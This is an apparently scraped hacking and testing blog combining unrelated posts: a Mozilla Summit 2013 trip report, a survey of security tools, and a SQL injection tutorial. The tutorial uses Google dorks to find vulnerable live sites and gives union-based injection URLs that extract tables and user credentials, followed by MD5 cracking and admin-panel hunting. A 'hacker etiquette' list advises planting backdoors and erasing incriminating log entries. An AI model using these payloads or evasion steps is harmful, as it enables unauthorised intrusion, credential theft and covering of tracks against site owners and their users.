Infographic: State of Security Testing by Nagasahas Dasa and Santhosh Tuppad

Infographic: State of Security Testing by Nagasahas Dasa and Santhosh Tuppad

Advertisements

It was May 21st Tuesday 2013, around 4:30AM IST.  I was on my bed struggling hard to sleep. I finally gave up and switched on my system to check my mails or just go online. A mail from Mozilla got rid of any lingering sleep. I was wide awake, yet strangely disoriented. [2013 Mozilla Summit!] It’s official, you’re invited!! am I dreaming! Later when I read everything, I was assured that it’s real and not spam 😉

I was pretty excited about the invite and was very happy to be a part of the summit.

Mozilla Summit 2013

The Mozilla Summit 2013, a 3 day event where most of the Mozillians meet, celebrate the success of Mozilla and make plans for the future advancements in web and technology

This was the first Mozilla-wide Summit in three years and we couldn’t be more excited! This year, the Summit was held in three different cities:

  1. Brussels, BE
  2. Santa Clara, CA, USA
  3. Toronto, ON, Canada

The Summit was organized simultaneously at all 3 places on October 3, 4 and 5th respectively

My time there

I was invited to attend Summit at Santa Clara, California. I was so excited to attend the Summit and meet Mozillians all over the world.

Finally on 3rd October, I was well packed and ready to fly and meet the family of Mozilla, the Mozillians.  It was my first flight journey, very excited and a bit scared as well ;), an enjoyable experience. When I landed at San Francisco, there was a huge team welcoming us with a big smile. We introduced ourselves to the team and we were taken to the hotel Santa Clara Marriott (the hub for most of the events in Santa Clara). We were shown to our rooms, where we rested and got refreshed

Finally the most awaited Mozilla Summit started with a warm welcome by Tristan, followed with a talk by Mitchell Baker about “What makes Mozilla Mozilla!” and series of other talks on strengths of Mozilla, how it is going to help the world, which inturn builds a healthy Mozillian.

Mozilla describes internet as OPEN with following mantra:

Know more, Do more, Do better!!

Know more about the world and emerging technology with internet. Do more without any kind of restrictions. Do better innovations to help the world.

World Fair was an event where Mozillians from different countries participated in the fair to demonstrate their work, different ideas and products created by the communities all over the world.

Next day started with the “Mozillian Pilates” by Pascal Finette  which was refreshing after a long journey from Bangalore, India to Santa Clara, California. Later, there was a talk by Tristan followed by similar talks. The Innovation fair which was the next event, was a platform where Mozillians could display their inventions they are working on. The focus of each Mozillian was same as everybody wanted to change the world with technology.

This was followed by different open sessions and the day was concluded with a Photo session of all Mozillians, one more memorable moment of the Summit.

894442_10151965578562090_505229502_o

Pillars of Mozilla:

  1. Build Products: Mozilla aim to build the WEB and want through great products, services and programs. As we do, make sure to delight and empower people across the internet and to show what is special about the web.
  2. Empower Communities: Communities that: lead, build and promote Mozilla’s work; and inspire and enable the Mozilla spirit in others.
  3. Teach and Learn: As a way to help people understand what “openness” feels like, how the web works and given them the knowledge they need to create, shape and control their own online lives.
  4. Shape Environments: We want to shape environments to embody and spread Mozilla’s vision and values. In particular, we aim to shape the consumer product environment towards openness, to shape the overall web platform to ensure that continues to embody the values in the Mozilla Manifesto, and to shape people’s mindset to understand and appreciate these values.

pillars

Totally Summit was extremely awesome to be able to meet so many Mozillians and the energy levels were very high. I lespecially liked the innovation part which was simply awesome and I was stunned with different innovations all together.If you ask me what I learnt, I would just say “Summit turned me from an introvert to an extrovert”. Mozillians taught me how to interact, and pitch into conversations of complete strangers and have a broader thinking level.

The Summit was an opportunity to celebrate the success and build the future with a fellow Mozillian, in simple words to understand who we are and what we have accomplished.  It was an amazing chance for me to connect,hack, and build a healthy relationship with people and community.

Five things I learned at Summit would be,

  1. Turning Ideas into action
  2. Blending passion with voice and actions
  3. Choosing our own adventure
  4. Importance of Community and Network
  5. Culture

I was at the right place. It’s so important to have a good, trusting relationship with community. Different people have different approaches. And what works for me may not work for others. But the summit had culture with same vision which is to improve the way internet is! The mishmash of research, expertise, responsiveness and approachability, and passion and kindness may be one of the reasons why I loved Summit this much.

Some of the Mozillians whom I met at  Summit 2013,

@bkerensa, @ajoysingha, @rahid, @bacharakis, @playingwithsid, @iamjayakumars, @amodnn, @vineelreddy, @rosanardila, @pfinette, @SujithReddyM, @MadalinaAna, @Sayak_Sarker, @NareshSundar, @midhunsss, @GalaxyK, @rtnpro,  @komal_Ji_gandhi, @kaustavdm, @H34V3NG0D, @neocatalyst, @haseeb_offline, @AjayJogawath, @chowdhury_sayan, @GauthRaj, @MerajImran

Reference: https://wiki.mozilla.org/Summit2013

Recently, I authored an article at TestingCircus e-magazine and I like to publish the same on my blog so that I can reach out to my readers who are not subscribed to testingcircus or couldn’t read due to whatsoever reason(s).

Thanks to Mr. Santhosh Tuppad for encouraging me to write this article and Mr. Ajoy Singha for providing me an opportunity to write for TestingCircus and I am looking forward to continue my contribution to TestingCircus e-magazine by writing, you can find my article in the following link  http://www.testingcircus.com/testing-circus-2013-september-edition/

Without much ado, here I present you with my article.


There is no wrong way to start hacking, everything is right way and I have my own way. Whatever your style of hacking is, make sure it’s consistent. If you are starting out today you can be benefited based on your skill sets. Don’t learn to hack, hack to learn.

Well, coming to the point how did I start hacking or how did I land up here, It was in the year 2008. I was in my 2nd year diploma where one of my friends was trying to download videos by searching on Google. In 2008, getting a video to your local machine was one of the biggest achievements for people of my age. My friend showed me how to get the videos from Google, by extracting only videos from the vast search results. He asked me to enter some string along with the search query.

Filetype: avi <Search Query>

He didn’t know what it was, and he told that he came to know about it through his senior. Ok!! As I am very much interested in computer technologies, I tried to find out what they are. I referred to many articles and found that they are called as GOOGLE DORKS. I even came across some of the terminologies like White, Black and Grey hat hackers. During this phase, I got a common response from whoever I asked about hacking, which was “Hacking is very difficult and I don’t know anything on it except that it is illegal”.

But, it is not illegal as I told you before. There are 3 categories of hackers:

  • Black Hat Hackers
  • White Hat Hackers
  • Grey Hat Hackers

Black Hat hackers are those who perform undercover hacking for malicious reasons and also with intent to harm others, such people can also be referred to as ‘crackers’.

White Hat hackers are those who perform hacking for legitimate reasons and use their skills and knowledge for good, e.g. IT Security technicians testing their systems and researchers testing the limitations of any software.

Grey hat hacker is a combination of a black hat and a white hat hacker. A grey hat hacker may surf the internet and hack into a computer system for the sole purpose of notifying the administrator that their system has a security defect.

According to a survey the most common technique of hacking a website is SQL Injection. SQL Injection is a technique in which hacker insert SQL codes into web form to get Sensitive Information like (User Name, Passwords) to access the site and deface it. The traditional SQL injection method is quite difficult, but nowadays there are many tools available online through which any script kiddie can use SQL Injection to deface a website. Because of these tools, websites have become more vulnerable to these types of attacks. Some of the tools used for SQL Injection are mentioned in this article. However, as I know nothing is bug free and there will be exploits every minute/hour.

Some of the tools which help in finding the vulnerabilities are discussed below:

1.      Wireshark is also known as Etherea. It is one of the most powerful tools in a network security, as a network packet analyzer on any network. It is used to capture each packet sent to or from your system to the router. If you’re capturing on a wireless interface and have promiscuous mode (Admin/super user) enabled in your capture options, you’ll also see other packets on the network sent from different nodes. This also includes filters ex: DNS, TCP, UDP, ip.addr etc), color-coding, capturing packets and other features that let you dig deep into network traffic. Wireshark is an extremely powerful tool; this is just scratching the surface of what you can do with it. Professionals use it to debug network protocol implementations, examine security problems and inspect network protocol internals. To get this position, it takes a fair amount of practice. It takes practice to know how and where to capture right data, filters to use, and how to interpret the data.

People willing to learn can use this link to get sample captures on Wireshark to get experience hands on this http://wiki.wireshark.org/SampleCaptures

2.      Fiddler is an open source web debugging tool which captures all the traffic between your computer and the internet, it also acts as proxy between the browser or any application on the local machine and the internet say, all the traffic flows through the fiddler and the requests can be altered and the altered request is been sent to the server. In simple words fiddler sits between HTTP client that is the browser and the HTTP server.

Normally it would be configured with all the browsers being used on a particular machine or you may have to manually configure the browser to capture all the traffic in/out of our machine.

Fiddler can also be used to find the statistics, inspect the request or the response and can even act as an auto responder and is capable of sending request from the fiddler wit out any browser. Fiddler is designed in such a way that it capability to run API’s through composer functionality and can even right some scripts which can be helpful for check automation and has the capability to decrypt HTTPS traffic.

3.      Nessus, the first public release was in 1998. Nessus was an open source vulnerability scanner, recently nessus turned into a paid tool. This tool is used for scanning both web application and network, Network can be either internal or external IP/Network. Nessus is designed to automate the testing and discovery of known security problems. Allowing system administrators to correct problems before they are exploited.

Nessus uses a client server design that allows the user to set up one server that has multiple nessus clients that can attach and initiate vulnerability scans, where servers can be placed at various strategic points on a network allowing tests to be conducted from various points of view.

Nessus security checks vulnerabilities and database is updated on a daily basis which could be retrieved to cross check the database with the command “nessus-update-plug-ins”.

4.      IBM Rational AppScan is an automated web vulnerability scanner which helps in finding the vulnerabilities quickly and effectively, even a svan (semi technical person) can also use the tool and find vulnerabilities.  Using IBM app scan, we can decrease the risks in web application attacks and data breaches. It helps in testing the web application either on production site or on any staging sites which can ensure that it checks for web attacks.

Basically in IBM AppScan once you add a web app to test for its security the initial step is to crawl all the pages/links on that application which are allowed to be crawled based on robots.txt

Basic functionalities of IBM AppScan are

  1. Gives the larger coverage of test report
  2. It mainly concentrates on top 10 OWASP (Open Web Application Security Project) web application vulnerabilities.
  3. Accurate and advanced scanning algorithms used hence less false positives
  4. Recommendations, Which I personally like here, It gives us description of each vulnerability found and the risk involved in not fixing it.

As we all know automated scanning is not perfect all the time and is not advisable to completely depend on automated scanner, hence they have provided a manual scanning for any vulnerability found to give the perfect solution without false positives.

IBM app scan is a paid tool and it has a trial version as well if you are interested in exploring the application.

5.      Nmap, also known as “network mapper”, it is an open source application which helps in quickly scanning different ranges of devices such as desktops/laptops or any mobile devices and provide valuable information about the devices which are connected to a particular network. Nmap is available for all the platforms where it can be operated in 2 ways, command mode and GUI mode but most people prefer command mode for its advanced features but requires technical knowledge.

Nmap uses raw IP packets to determine what hosts are available on the network (Host Detection), the services that are enabled, the operating system and version, using TCP SYN or a TCP Connect ping to gather active hosts. Nmap is used by security researchers and hackers who want to find the weakness and exploit them.

Nmap can provide different types of scans, where some are more aggressive and some are simple, designed to be stealthy and scan undetected. Depending on the type of scan performed, different information can be discovered; some of the scans are Ping, SYN Stealth, UDP Scan, IP Protocol Scan, ACK Scan, RPC Scan, List Scan etc.

6.      Havij is an automated SQL Injection tool that helps hackers or security researchers to find and exploit SQL Injection vulnerabilities on a web page on a vulnerable web application, using Havij user can access database, retrieve DBMS users and  password, dump tables and columns, fetching data from the database, running SQL  statements and  executing commands on the  operating system.

Hackers use Havij along with vulnerability scanners such as IBM AppScan or Web Inspect, vulnerability scanners find vulnerabilities but not help you in actual exploitation and that’s where Havij showcases its functionality.  In other words, vulnerability scanners will help you in finding list of vulnerable webpage’s whereas; Havij helps you with the access to the database for entire exploitation.

Once URL is feed to the Havij, it comes up with a list of databases being used, version, and db-name’s. Later selecting a particular database we can drill down to tables, and then to columns and even to the actual data. Passwords would hashed usually, there are set of de-crypter’s  associated with the tool which help user to decrypt the hashed password, it is also associated with an algorithm which helps users to find the admin page of a particular web application. In simple words it’s more useful for hackers than security researchers.

7.      SQLMap is one of the most popular and powerful open source SQL injection automation tool, which is built on python and can run on any platform if python is installed in it.

Giving a vulnerable URL, SQLMap can exploit the database and provides with sensitive information like extracting database names, tables, columns, all the data in the tables etc. It can even read and write files on the remote file system under certain conditions.

We can run this application only on command mode and doesn’t have an interface, and has simple commands to extract information from the database.

Dear readers, you have been following me on this blog which is on *.wordpress.com. I am freaking happy to announce that I have transferred all the blog posts to new domain and new hosting of my own. Please visit http://solidmonster.com/ from now on. Thanks all!

Big time!!! Been long time since I posted this blog, this would be something interesting than usual one which helps you to bring out the hacker inside you 😉 SQL Injection which is commonly known as SQLI! Here I would be demonstrating about SQLI which is the one of the top 10 vulnerabilities listed in OWASP (Online Web Application Security Project) not just one of the top 10 vulnerabilities but oldest and topmost from so many years.

This blog, no I can say tutorial! This tutorial gives you the idea to get into any database which has SQL vulnerability. So let’s go ahead with basics.

What is SQL?
SQL (or Structured Query Language) is a special-purpose programming language designed for managing data held in a relational database management system (RDBMS).

What is SQL Injection?
SQL injection is a code injection technique that exploits security vulnerability in an application’s software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed.
To start with this exploitation we can utilize Google in finding the sites which has possibility of having the application vulnerable using Google Dorks.

What are Google Dorks?
Google dorks or Google Operators are the center of attraction for Google Hacking, which helps in extracting required information from the Google. Many hackers use Google to find vulnerable webpage’s and later use these vulnerabilities for hacking. You can get a list of Google Dorks here

Using Google Dorks:

But for now the only Google dorks we will be using for extracting required information are,

  • inurl:index.php?id=
  • inurl:page.php?id=
  • inurl:prod_detail.php?id=

These will list all websites containing ” prod_detail.php?id=in the URL. (Depending on Dork we are using)

NOW, enter that into Google and start opening WebPages. Finding SQLI Vulnerabilities in websites is very simple. You can simply use a single ‘ or a ” at the end of the URL.

Example: http://www.example.com/index.php?id=1&#8242;
Example: http://www.example.com/index.php?id=1&#8243;

If the website is vulnerable it will produce an error which is similar to the following:

Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

If you see this that means you have found a SQL Injection vulnerability in the website. For security purpose let’s consider domain as “example” for this tutorial:

Exploiting the vulnerability

http://www.example.hu/prod_detail.php?id=837&#8242;


SQL Injection Error Message
This shows that the website is vulnerable to SQL injection.

Step 1: Finding how many columns the site has

To do this we use the Order by query to find how many columns it has.

http://www.example.hu/prod_detail.php?id=837 order by 100–

We will most likely get an error saying,

Query failed: 1054 – Unknown column ‘100’ in ‘order clause’
Select products_model, products_name, products_short, products_image, products_price, products_status, products_describe, categories_name, manufacturers_name from products join manufacturers on (fi_manufacturers = id_manufacturers) join categories on (fi_categories = id_categories) where id_products = 837 order by 100–

SQL Injection Error on Colomns
That means the number is too high so we will lower it.

http://www.example.hu/prod_detail.php?id=837 order by 10–

If we get an error yet again, the number is still too high, try with lesser value. Let’s take 7

http://www.example.hu/prod_detail.php?id=837 order by 7–

The page will most likely load successfully, if not, then the site may not be fully vulnerable to SQL injection. If it loads successfully increase the number yet again. Once you get to the Max number where it loads successfully, that is the amount of columns a site has. Here in this example it is 9.

http://www.example.hu/prod_detail.php?id=837 order by 9–

SQL Injection Order By
Step 2: Finding the vulnerable columns.

To do this we use Union All Select. Like So,

http://www.example.hu/prod_detail.php?id=837 union all select 1,2,3,4,5,6,7,8,9–

With some sites that won’t be enough to find the vulnerable columns, sometimes it needs the extra push, so we need to force the error. Add a behind the 837 like this prod_detail.php?id=-837

The URL should look like,

http://www.example.hu/prod_detail.php?id=-837 union all select 1,2,3,4,5,6,7,8,9–

SQL Injection Union Slect All

Now it will show the vulnerable columns. The vulnerable columns will be numbers that weren’t there before; the page will also look a lot different. In this case Columns 1, 2,3,7,8 and 9 are vulnerable.

Step 3: Exploiting vulnerability

Now, here comes the hardest part as people think but it’s not that hardest! Mind it; anything is possible if you love it. Let’s just collect some info about the site. Such as Database Name, User Name, and the Version. Remember the vulnerable columns from before? This is where we use them!

In your Union All Select statement replace the vulnerable column numbers with the three bits of info you want. [Database(), User(), Version()].

http://www.example.hu/prod_detail.php?id=-837 union all select version(),database(),user(),4,5,6,7,8,9–

SQL Injection Command Execution

Where the 1,2,3 were on the page before (Or whatever vulnerable column number you used) The bits of information will show on this website, the three pieces of information are,

Database(): web***2
User(): web***u @ localhost
Version(): 5.6.10-log

Great, our first bits of extracted data! We should get some more information. Now before we continue on there are something’s that you’ll need.

  1. Firefox Browser
  2. HackBar Plugin

Okay let’s continue, Next step is to list all the tables. We will now use Group_Concat(table_name) and from information_schema.tables where table_schema=database()–

Don’t worry its simpler than it looks! URL looks like this,

http://www.example.hu/prod_detail.php?id=-837 union all select 1,2,3,4,5,6,group_concat(table_name),8,9 from information_schema.tables where table_schema=database()–

Hey Look! Tables 😉

categories, config, contents, counter, manufacturers, news, orders, orders_products, products, user

SQL Injection Tables

Well done you’ve successfully extracted the table names. But wait, there’s more! Sadly there is no admin table, but sometimes there is. So let’s go with exploring user table.

Have you installed that Firefox plug-in yet? Because you are going to need it now.

Next thing you need to do is replace Group_Concat(Table_Name) with group_concat(Column_name). If you have HackBar installed press F9, click SQL drop down button go to MySQL then click MySQL CHAR() and Enter the table name.

In this case, user and replace from information_schema.tables where table_schema=database()– with from information_schema.columns where table_name=MYSQLCHAR

The Char will be the code you receive from HackBar in this case user can be encoded as CHAR (117, 115, 101, 114)

The Final URL will look like this:

http://www.example.hu/prod_detail.php?id=-837 union all select 1,2,3,4,5,6,group_concat(column_name),8,9 from information_schema.columns where table_name=CHAR(117, 115, 101, 114)–

Okay, cool, we have the column names now.

id_user,user_name,user_pw,user_email

SQL Injection Columns

Now our next task is to get the data from these columns. To do this replace group_concat(column_name) with group_concat(Column_name_2,0x3a,Column_name_3) Where Column_name_2 and Column_name_3 are the column names you want to extract data from. Such as user_name and user_pw.

Now change from information_schema.columns where table_name=CHAR to from user if you want to extract data from a different table name change user to the table name you want to extract data from.

The URL looks like this,

http://www.example.hu/prod_detail.php?id=-837 union all select 1,2,3,4,5,6,group_concat(user_name,0x3a,user_pw),8,9 from user—

SQL Injection Credentials

We’ve now extracted data! Good Job.

Now we got user table which also contains the admin credentials and we found Username and Password of user you will find MD5 hashed passwords usually. Too decrypt these go to md5decrypter.co.uk it’s a great site!

You also need to find the admin control panel, try simple URL’s like /admin or /login etc. look on Google for an admin page finder tools. Hope this helps you!

This blog is purely for educational purposes only. Information posted is not intended to harm anyone or any organization.

If anyone wants to have the document on your local system, download it here.

Sit Down Series – 2

Posted: April 21, 2013 in Hacking
Tags: , ,

Download Beta
Hi Readers.

Below we have jotted down a few etiquettes of a Hacker and his/her Victim. Hope this helps you if you are/were one among them.

Etiquettes – Victim

  1. It is okay to panic, even hackers get hacked. It can be a learning experience.
  2. Be normal.
  3. Change the password from own/other system.
  4. Clear the temp [TEMP, %TEMP%] folder.
  5. Restart the system.
  6. Report the issue.
  7. Post your queries at forums find related issues and may be you will find a solution [temporary/permanent].
  8. Check your task manager, test your firewall for suspicious/malicious program and terminate them.
  9. Save the records of the attack, to investigate or report the incident.
  10. Sign off from all logged in sessions.
  11. Try to remember your last login activity.
  12. Have you saved your password on other system?
  13. Did your hacker friend plant this attack?
  14. Have you shared your password with anyone?
  15. Safeguard your other accounts [bank/other] that are linked to the compromised account.
  16. Let your community know that your account has been compromised.
  17. Find measures to safeguard your account.
  18. Write about it, spread the awareness.
  19. Importantly check if it‘s a spoof or a real attack.
  20. Remember humans are the weakest link.

Etiquettes – Hacker

  1. Acquire necessary permission to plant any attack.
  2. Obtain grants, permissions, rights for every action of yours.
  3. Watch every step of yours [must be retrace-able].
  4. Use the rights ethically.
  5. Own responsibility for your actions.

Secure your machine first.

  1. Use Proxy IP addresses.
  2. Create a backdoor which helps you to plant your next attack.
  3. Be anonymous.
  4. Clear the last login activity if you are using the victim’s system to hack his/her own account.
  5. Build layers of security to prevent easy trace backing.
  6. Spoof the Media Access Control address.
  7. Use public cyber space to plant your attack, if you are an amateur 😛
  8. Erase your tracks.( Don’t delete entire logfiles, instead, just remove only the incriminating entries from the file. )

Hackers misusing this information may be a local and/or federal criminal act (crime). This article is intended to be informational and should only be used for ethical and not illegal purposes.

We web security enthusiasts (Santhosh Tuppad, Jyothi R and I) got together to learn and share about Computer and Web Security.

Black and white hat hackers have their own set of ethics. What does your list look like, do share.

Happy reading!

What is hacking?? What is hack?? Who is hacker?

The main intention of this blog is to educate people about hacking. Most of the people I have met have a different and confusing meaning of hacking. The most common answer which I heard was “getting password of a different user i.e. unauthorized access or stealing money from others account”.

This perception on hacking is because of lack of information or what people have heard. Similar situation appeared in one of the talks on Information Security which was held at one of the famous engineering college in Bangalore by Santhosh Tuppad who is a security specialist and my Guru. Students showed a great interest as the talk was regarding hacking/security, but initially when they were asked, what hacking is, the answers were again the same old. This inspired me to write this blog, so that it helps in understanding more on hacking.

The term Hacker was first introduced in 1960’s and was used to describe a programmer or someone who hacked out computer code. Later the term evolved to an individual who had an advanced understanding of computers, networking, programming, or hardware, but did not have any malicious intents.

Hacking is a practice of altering or modifying the features of a system or an application, in order to accomplish a goal outside the creator’s original design or aim. The person who is consistently engaging in hacking activities, and has accepted hacking as a lifestyle and philosophy of their choice, is called a hacker.

Recently, Computer hacking is the most popular form of  hacking , mainly in the field of Information Security, but hacking exists in many other forms like cellular hacking, web app hacking, network hacking etc. and its not limited to this and can be extended to anything in this world. Just because of great attention given to black hat hackers from the social media, the whole hacking term is often mistaken for any security related cybercrime. This damages the reputation of all hackers, and is very bad and unfair. The other intention of this blog is to introduce people the true ethics of hackers, hopefully clearing the blame they are facing now and giving them the social status which they actually deserve.

Crackers!!! Malicious attacks on computer networks are officially known as cracking, these are another set of people who call themselves as hackers, but technically speaking they aren’t. These are people who break into computers and phreaking the phone system with minimal knowledge on the system or the application and loudly call themselves as hackers. But many journalists and writers have been fooled into using the word hacker to describe crackers.

Hackers solve problems in their own way, they solve problems in different way. Actually the way of thinking itself is different and they believe in freedom and live as they wish to. To be recognized as a hacker, you have  to set your own rules and attitude which suits your identity and to behave as though you have a great attitude and passion on yourself.

Hacktivist!!!! He is considered as an hacker who utilizes technology to announce a social, ideological, religious, or political message. In general, most hacktivism involves website defacement or denial-of-service attacks. In more extreme cases, hacktivism is used as tool for Cyber terrorism.

The people who actually build Web applications are not paying much attention to security. Stakeholders are looking for people who are creative and able to build interesting Web sites rather than secured websites. They rate security to No. 6 and creativeness to No. 1

Reasons for hacking are very different like,

  • Criminal intent: stealing credit card numbers, harming a competing company, extortion of money by threatening to hack again or reveal sensitive information found on the computer and other reasons.
  • Ideological reasons: Some hackers would attack sites that go against their worldview  anti-globalists hack sites of large corporations, some groups of Muslim hackers attack Israeli sites from time to time, and sites of racist organizations often come under attack.
  • Personal revenge: Some hackers would use their skills to harm people for real or perceived wrongs, to either ruin their computer or find personal information and make it public.
  • Some hackers simply attack in order to harm. They are angry at the world for something, and hacking is their way to perform vandalism.
  • Some hackers attack to check their skills at computer safety. Sometimes those attacks will cause no harm, and in some cases the hacker will inform the victims of failure in his defenses.

Well.. last but not least, Hacking is an art. It won’t happen overnight. Hacking is a game to prove how smart you are.  Start by learning a programming language. Depending on what you want to do (Web Hacking or System Hacking)

References:

http://whatishacking.org/

http://tuppad.com/blog/

http://phys.org/news/2013-04-hacking.html